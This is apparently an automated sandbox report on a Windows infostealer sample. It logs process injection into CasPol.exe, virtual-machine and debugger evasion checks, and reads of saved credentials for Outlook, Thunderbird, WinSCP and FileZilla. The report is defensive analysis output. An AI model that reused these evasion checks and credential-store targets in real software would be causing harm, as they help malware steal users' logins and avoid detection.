            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeFile created: C:\Users\user\AppData\Local\Temp\nsj5705.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/4@3/3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_004021AA CoCreateInstance,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2624:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2624:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000004.00000000.34495451157.0000000001100000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.34639544413.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_717530C0 push eax; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1AAE1 pushad ; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A14C30 push ebx; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1B63A push 155B0F6Bh; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1B261 push ebp; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A14BF3 push ebx; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A16322 push 26E9F687h; retn 0000h
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A24301 push CA145685h; retf 77CCh
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A14D17 push ebx; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A15F4C push ecx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01113DD4 push FFFFFFB9h; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01113DF9 push FFFFFFB9h; retf
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_71751BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeFile created: C:\Users\user\AppData\Local\Temp\nsz5764.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exe, 00000001.00000002.34639859146.0000000002B01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exe, 00000001.00000002.34639859146.0000000002B01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016Thread sleep time: -7378697629483816s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A198A0 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9268
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_0040290B FindFirstFileW,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeSystem information queried: ModuleInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeAPI call chain: ExitProcess graph end node
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exe, 00000001.00000002.34640199629.0000000004699000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.39260591348.0000000003069000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exe, 00000001.00000002.34640199629.0000000004699000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.39260591348.0000000003069000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000004.00000002.39260591348.0000000003069000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exe, 00000001.00000002.34640199629.0000000004699000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.39260591348.0000000003069000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exe, 00000001.00000002.34640199629.0000000004699000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.39260591348.0000000003069000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exe, 00000001.00000002.34639859146.0000000002B01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exe, 00000001.00000002.34640199629.0000000004699000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.39260591348.0000000003069000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000004.00000002.39260591348.0000000003069000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000004.00000002.39259082655.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.39258621414.000000000149B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exe, 00000001.00000002.34639859146.0000000002B01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exe, 00000001.00000002.34640199629.0000000004699000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.39260591348.0000000003069000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exe, 00000001.00000002.34640199629.0000000004699000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.39260591348.0000000003069000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exe, 00000001.00000002.34640199629.0000000004699000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.39260591348.0000000003069000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 00000004.00000002.39260591348.0000000003069000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_71751BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A198A0 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A186A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A24AAA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1D4DC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A20E4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A241B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A25FB7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1CD83 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1100000
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1668, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1668, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
